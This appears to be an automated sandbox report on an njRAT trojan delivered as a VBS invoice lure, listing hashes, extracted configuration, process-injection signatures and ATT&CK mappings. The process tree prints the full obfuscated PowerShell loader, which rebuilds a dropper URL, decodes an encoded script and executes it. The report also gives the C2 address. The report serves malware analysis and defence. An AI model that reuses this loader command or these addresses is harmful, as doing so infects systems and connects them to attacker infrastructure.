njrat | d0b59cba5f88973dfeea8610926e26b61b4c25125bfd8168954e9dd87d6b132d

General

Target

Invoice_and_payment_copy.vbs
Size

5KB
MD5

83b9414820f37287d526b16da3c6e6d9
SHA1

9afab0d39520db7e8754ac5c9e27f7d73220d27c
SHA256

d0b59cba5f88973dfeea8610926e26b61b4c25125bfd8168954e9dd87d6b132d
SHA512

1879f8dc3087a0a5e3a4b7f21ef210fe8278117ef687fac45ccd0d71e63ef6b9a621a036b222fc5bf6ad007df76bc6d0ec3f8c3f6b7dcd20dcad6fc31b945fb1

Score

10^/10

njrat boss trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://54.184.87.30/Dbypass.txt

Extracted

Family

njrat

Version

v4.0

Botnet

Boss

C2

103.147.184.73:7103

Mutex

Windows

Attributes

reg_key
Windows
splitter
|-F-|

Signatures

njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

5 4848 powershell.exe
9 4848 powershell.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 4848 set thread context of 2972 4848 powershell.exe aspnet_compiler.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe

pid process

4848 powershell.exe
4848 powershell.exe
4848 powershell.exe

flow	pid	process
5	4848	powershell.exe
9	4848	powershell.exe

description	pid	process	target process
PID 4848 set thread context of 2972	4848	powershell.exe	aspnet_compiler.exe

pid	process
4848	powershell.exe
4848	powershell.exe
4848	powershell.exe

Suspicious use of AdjustPrivilegeToken 24 IoCs

Processes:

powershell.exeaspnet_compiler.exe

description	pid	process
Token: SeDebugPrivilege	4848	powershell.exe
Token: SeDebugPrivilege	2972	aspnet_compiler.exe
Token: 33	2972	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	2972	aspnet_compiler.exe
Token: 33	2972	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	2972	aspnet_compiler.exe
Token: 33	2972	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	2972	aspnet_compiler.exe
Token: 33	2972	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	2972	aspnet_compiler.exe
Token: 33	2972	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	2972	aspnet_compiler.exe
Token: 33	2972	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	2972	aspnet_compiler.exe
Token: 33	2972	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	2972	aspnet_compiler.exe
Token: 33	2972	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	2972	aspnet_compiler.exe
Token: 33	2972	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	2972	aspnet_compiler.exe
Token: 33	2972	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	2972	aspnet_compiler.exe
Token: 33	2972	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	2972	aspnet_compiler.exe

Suspicious use of WriteProcessMemory 10 IoCs

Processes:

WScript.exepowershell.exe

description	pid	process	target process
PID 4800 wrote to memory of 4848	4800	WScript.exe	powershell.exe
PID 4800 wrote to memory of 4848	4800	WScript.exe	powershell.exe
PID 4848 wrote to memory of 2972	4848	powershell.exe	aspnet_compiler.exe
PID 4848 wrote to memory of 2972	4848	powershell.exe	aspnet_compiler.exe
PID 4848 wrote to memory of 2972	4848	powershell.exe	aspnet_compiler.exe
PID 4848 wrote to memory of 2972	4848	powershell.exe	aspnet_compiler.exe
PID 4848 wrote to memory of 2972	4848	powershell.exe	aspnet_compiler.exe
PID 4848 wrote to memory of 2972	4848	powershell.exe	aspnet_compiler.exe
PID 4848 wrote to memory of 2972	4848	powershell.exe	aspnet_compiler.exe
PID 4848 wrote to memory of 2972	4848	powershell.exe	aspnet_compiler.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Invoice_and_payment_copy.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:4800
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $SZXDCFVGBHNJSDFGH = 'http://54XXX184XXX87XXX30/DbypassXXXtxt'.Replace('XXX','.');$SOS='2^===H===^5===H===^^===H===52===H===^`===H===^7===H===^8===H===^e===H===^a===H===^d===H===^b===H===^^===H===^5===H===^`===H===^7===H===^8===H===^a===H===20===H===3d===H===20===H===27===H===`e===H===^5===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===^5===H===`2===H===^3===H===2b===H===2b===H===2b===H===2b===H===2b===H===2b===H===2b===H===2b===H===2b===H===2b===H===2b===H===2b===H===2b===H===2b===H===2b===H===2b===H===5^===H===27===H===2e===H===52===H===`5===H===70===H===`c===H===`1===H===`3===H===`5===H===28===H===27===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===27===H===2c===H===27===H===7^===H===2e===H===57===H===27===H===29===H===2e===H===52===H===`5===H===70===H===`c===H===`1===H===`3===H===`5===H===28===H===27===H===2b===H===2b===H===2b===H===2b===H===2b===H===2b===H===2b===H===2b===H===2b===H===2b===H===2b===H===2b===H===2b===H===2b===H===2b===H===2b===H===27===H===2c===H===27===H===`c===H===^9===H===^5===H===^e===H===27===H===29===H===3b===H===0a===H===2^===H===53===H===58===H===^^===H===^3===H===^`===H===5`===H===^7===H===^2===H===^8===H===^e===H===^a===H===58===H===^^===H===^3===H===^`===H===5`===H===^7===H===^2===H===^8===H===^a===H===^b===H===20===H===3d===H===20===H===27===H===^^===H===^f===H===2a===H===2a===H===2a===H===2a===H===2a===H===2a===H===2a===H===2a===H===2a===H===2a===H===2a===H===2a===H===2a===H===`1===H===^^===H===53===H===5^===H===3c===H===3c===H===3c===H===3c===H===3c===H===3c===H===3c===H===3c===H===3c===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===^7===H===27===H===2e===H===52===H===`5===H===70===H===`c===H===`1===H===`3===H===`5===H===28===H===27===H===2a===H===2a===H===2a===H===2a===H===2a===H===2a===H===2a===H===2a===H===2a===H===2a===H===2a===H===2a===H===2a===H===27===H===2c===H===27===H===57===H===`e===H===^c===H===`f===H===27===H===29===H===2e===H===52===H===`5===H===70===H===`c===H===`1===H===`3===H===`5===H===28===H===27===H===3c===H===3c===H===3c===H===3c===H===3c===H===3c===H===3c===H===3c===H===3c===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===27===H===2c===H===27===H===72===H===^9===H===`e===H===27===H===29===H===3b===H===0a===H===2^===H===53===H===57===H===58===H===^^===H===^5===H===^3===H===52===H===^`===H===^7===H===59===H===^8===H===55===H===^a===H===^9===H===53===H===^^===H===^`===H===5`===H===^7===H===^8===H===^a===H===20===H===3d===H===27===H===^9===H===`0===H===^5===H===58===H===28===H===`e===H===`0===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===`0===H===`3===H===`0===H===5^===H===20===H===2^===H===^5===H===^^===H===52===H===^`===H===^7===H===^8===H===^e===H===^a===H===^d===H===^b===H===^^===H===3c===H===3c===H===3c===H===3c===H===3c===H===3c===H===3c===H===3c===H===3c===H===3c===H===3c===H===3c===H===3c===H===3c===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===^7===H===^2===H===^8===H===^e===H===^a===H===53===H===^^===H===^`===H===^7===H===^8===H===29===H===27===H===2e===H===52===H===`5===H===70===H===`c===H===`1===H===`3===H===`5===H===28===H===27===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===27===H===2c===H===27===H===`5===H===`0===H===57===H===`0===H===2d===H===^f===H===`2===H===`a===H===`0===H===^5===H===27===H===29===H===2e===H===52===H===`5===H===70===H===`c===H===`1===H===`3===H===`5===H===28===H===27===H===3c===H===3c===H===3c===H===3c===H===3c===H===3c===H===3c===H===3c===H===3c===H===3c===H===3c===H===3c===H===3c===H===3c===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===27===H===2c===H===27===H===^5===H===^`===H===^7===H===^8===H===^a===H===29===H===2e===H===2^===H===53===H===58===H===^^===H===^3===H===^`===H===5`===H===^7===H===^2===H===^8===H===^e===H===^a===H===58===H===^^===H===^3===H===^`===H===5`===H===^7===H===^2===H===^8===H===^a===H===^b===H===28===H===2^===H===53===H===5a===H===58===H===^^===H===^3===H===^`===H===5`===H===27===H===29===H===3b===H===0a===H===2`===H===28===H===27===H===^9===H===27===H===2b===H===27===H===^5===H===58===H===27===H===29===H===28===H===2^===H===53===H===57===H===58===H===^^===H===^5===H===^3===H===52===H===^`===H===^7===H===59===H===^8===H===55===H===^a===H===^9===H===53===H===^^===H===^`===H===5`===H===^7===H===^8===H===^a===H===20===H===2d===H===^a===H===`f===H===`9===H===`e===H===20===H===27===H===27===H===29===H===7c===H===2`===H===28===H===27===H===^9===H===27===H===2b===H===27===H===^5===H===58===H===27===H===29===H===3b'.Replace('^','4').Replace('`','6');Invoke-Expression (-join ($SOS -split '===' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) }))
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4848
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2972

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2972-3451-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/2972-3464-0x00000000052B0000-0x00000000052B1000-memory.dmp

Filesize
4KB

Download
memory/2972-3463-0x0000000005300000-0x0000000005301000-memory.dmp

Filesize
4KB

Download
memory/2972-3462-0x0000000005250000-0x0000000005251000-memory.dmp

Filesize
4KB

Download
memory/2972-3461-0x0000000005760000-0x0000000005761000-memory.dmp

Filesize
4KB

Download
memory/2972-3460-0x0000000004C00000-0x0000000004C01000-memory.dmp

Filesize
4KB

Download
memory/2972-3452-0x000000000040836E-mapping.dmp

Download
memory/4848-129-0x00000158FDF73000-0x00000158FDF75000-memory.dmp

Filesize
8KB

Download
memory/4848-3450-0x0000015880360000-0x0000015880364000-memory.dmp

Filesize
16KB

Download
memory/4848-195-0x00000158FDF78000-0x00000158FDF79000-memory.dmp

Filesize
4KB

Download
memory/4848-130-0x00000158FDF76000-0x00000158FDF78000-memory.dmp

Filesize
8KB

Download
memory/4848-127-0x00000158FDF70000-0x00000158FDF72000-memory.dmp

Filesize
8KB

Download
memory/4848-114-0x0000000000000000-mapping.dmp

Download
memory/4848-125-0x0000015880390000-0x0000015880391000-memory.dmp

Filesize
4KB

Download
memory/4848-120-0x00000158801E0000-0x00000158801E1000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads